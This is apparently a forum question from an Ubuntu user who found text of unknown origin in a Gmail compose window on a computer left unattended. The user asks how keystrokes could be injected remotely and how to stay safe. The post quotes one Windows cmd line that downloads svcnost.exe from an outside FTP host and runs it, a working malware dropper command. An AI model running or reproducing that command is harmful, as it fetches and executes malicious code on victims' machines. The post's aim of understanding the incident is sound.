My home PC is usually on, but the monitor is off. This evening I came home from work and found what looks like a hack attempt: in my browser, my Gmail was open (that was me), but it was in compose mode with the following in the
md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
echo You got owned
This looks like Windows command line code to me, and the
md start of the code combined with the fact that Gmail was in compose mode, makes it evident that someone tried to run a
cmd command. I'm guess I was lucky that I don't in fact run Windows on this PC, but I have others that do. This is the first time ever that something like this has happened to me. I'm not a Linux guru, and I wasn't running any other programs apart from Firefox at the time.
I'm absolutely sure that I didn't write this, and nobody else was physically at my computer. Also, I have recently changed my Google password (and all my other passwords) to something like
vMA8ogd7bv so I don't think that someone hacked my Google account.
What just happened? How does someone put keystrokes on my computer when it's not granny's old Windows machine that has been running malware for years, but a recent new Ubuntu install?
Let me address some of the points and questions:
- I'm in Austria, in the countryside. My WLAN router runs WPA2/PSK and a medium-strong password that's not in the dictionary; would have to be brute-force and less than 50 meters from here; it's not likely that it got hacked.
- I'm using a USB wired keyboard, so again very unlikely that anybody could be within range to hack it.
- I wasn't using my computer at the time; it was just idling at home while I was at work. It's a monitor-mounted nettop PC, so I rarely turn it off.
- The machine is only two months old, only runs Ubuntu, and I'm not using weird software or visiting weird sites. It's mainly Stack Exchange, Gmail, and newspapers. No games. Ubuntu is set to keep itself up to date.
- I'm not aware of any VNC service running; I certainly haven't installed or enabled one. I've also not started any other servers. I'm unsure if any are running in Ubuntu by default?
- I know all the IP addresses in Gmail's account activity. I'm fairly sure Google wasn't an entryway.
- I found a Log File Viewer, but I don't know what to look for. Help?
What I really want to know is, and what really makes me feel unsafe, is: how can anyone from the Internet generate keystrokes on my machine? How can I prevent that without being all tinfoil-hat about it? I'm not a Linux geek, I'm a father who's messed with Windows for 20+ years and am tired of it. And in all the 18+ years of being online, I've never personally seen any hack attempt, so this is new to me.